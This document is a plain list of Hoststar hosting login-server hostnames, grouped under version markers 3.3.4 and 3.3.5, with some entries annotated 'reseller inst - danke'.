login-21.hoststar.ch *
login-22.hoststar.ch *
login-23.hoststar.ch *
login-24.hoststar.ch *
login-25.hoststar.ch *
login-26.hoststar.ch *
login-27.hoststar.ch *
login-28.hoststar.ch *
login-29.hoststar.ch *
login-3.hoststar.ch *
login-31.hoststar.ch *
login-32.hoststar.ch *
login-33.hoststar.ch *
login-34.hoststar.ch *
login-35.hoststar.ch *
login-36.hoststar.ch *
login-37.hoststar.ch *
login-38.hoststar.ch *
login-4.hoststar.ch *
login-54.hoststar.ch *
login-6.hoststar.ch *
login-62.hoststar.ch *
login-66.hoststar.ch *
login-7.hoststar.ch *
login-75.hoststar.ch *
login-76.hoststar.ch *
login-77.hoststar.ch *
login-78.hoststar.ch *
login-79.hoststar.ch *
login-8.hoststar.ch *
login-9.hoststar.ch *
tux27.hoststar.ch *
tux33.hoststar.ch *
tux9.hoststar.ch *
3.3.4
login-74.hoststar.ch *
login-81.hoststar.ch *
login-82.hoststar.ch *
login-83.hoststar.ch *
login-84.hoststar.ch *
login-85.hoststar.ch *
login-86.hoststar.ch *
login-88.hoststar.ch *
3.3.5
login-1.hoststar.at *
login-102.hoststar.ch *
login-103.hoststar.ch *
login-104.hoststar.ch *
login-105.hoststar.ch *
login-106.hoststar.ch *
login-107.hoststar.ch *
login-108.hoststar.ch *
login-109.hoststar.ch *
login-11.loginserver.ch *
login-111.hoststar.ch *
login-112.hoststar.ch *
login-113.hoststar.ch *
login-114.hoststar.ch *
login-115.hoststar.ch *
login-116.hoststar.ch *
login-117.hoststar.ch *
login-118.hoststar.ch *
login-119.hoststar.ch *
login-121.hoststar.ch *
login-122.hoststar.ch *
login-123.hoststar.ch *
login-124.hoststar.ch *
login-125.hoststar.ch *
login-126.hoststar.ch *
login-127.hoststar.ch *
login-128.hoststar.ch *
login-129.hoststar.ch *
login-13.loginserver.ch *
login-131.hoststar.ch * *reseller inst - danke*
login-133.hoststar.ch * *reseller inst - danke*
login-134.hoststar.ch * *reseller inst - danke*
login-135.hoststar.ch * *reseller inst - danke*
login-136.hoststar.ch * *reseller inst - danke*
login-137.hoststar.ch * *reseller inst - danke*
login-138.hoststar.ch * *reseller inst - danke*
login-139.hoststar.ch * *reseller inst - danke*
login-14.loginserver.ch *
login-141.hoststar.ch * *reseller inst - danke*
login-142.hoststar.ch * *reseller inst - danke*
login-143.hoststar.ch * *reseller inst - danke*
login-144.hoststar.ch * *reseller inst - danke*
login-145.hoststar.ch * *reseller inst - danke*
login-146.hoststar.ch * *reseller inst - danke*
login-147.hoststar.ch * *reseller inst - danke*
login-148.hoststar.ch * *reseller inst - danke*
login-149.hoststar.ch * *reseller inst - danke*
login-15.hoststar.at *
login-15.loginserver.ch *
login-151.hoststar.ch *
login-152.hoststar.ch * *reseller inst - danke*
login-153.hoststar.ch * *reseller inst - danke*
login-154.hoststar.ch * *reseller inst - danke*
login-16.hoststar.at *
login-16.loginserver.ch *
login-17.hoststar.at *
login-17.loginserver.ch *
login-18.loginserver.ch *
login-19.loginserver.ch *
login-20.loginserver.ch *
login-21.loginserver.ch *
login-22.loginserver.ch *
login-87.hoststar.ch *
login-89.hoststar.ch *
login-91.hoststar.ch *
login-92.hoststar.ch *
login-93.hoststar.ch *
login-94.hoststar.ch *
login-95.hoststar.ch *
login-96.hoststar.ch *
login-97.hoststar.ch *
login-98.hoststar.ch *
login-99.hoststar.ch *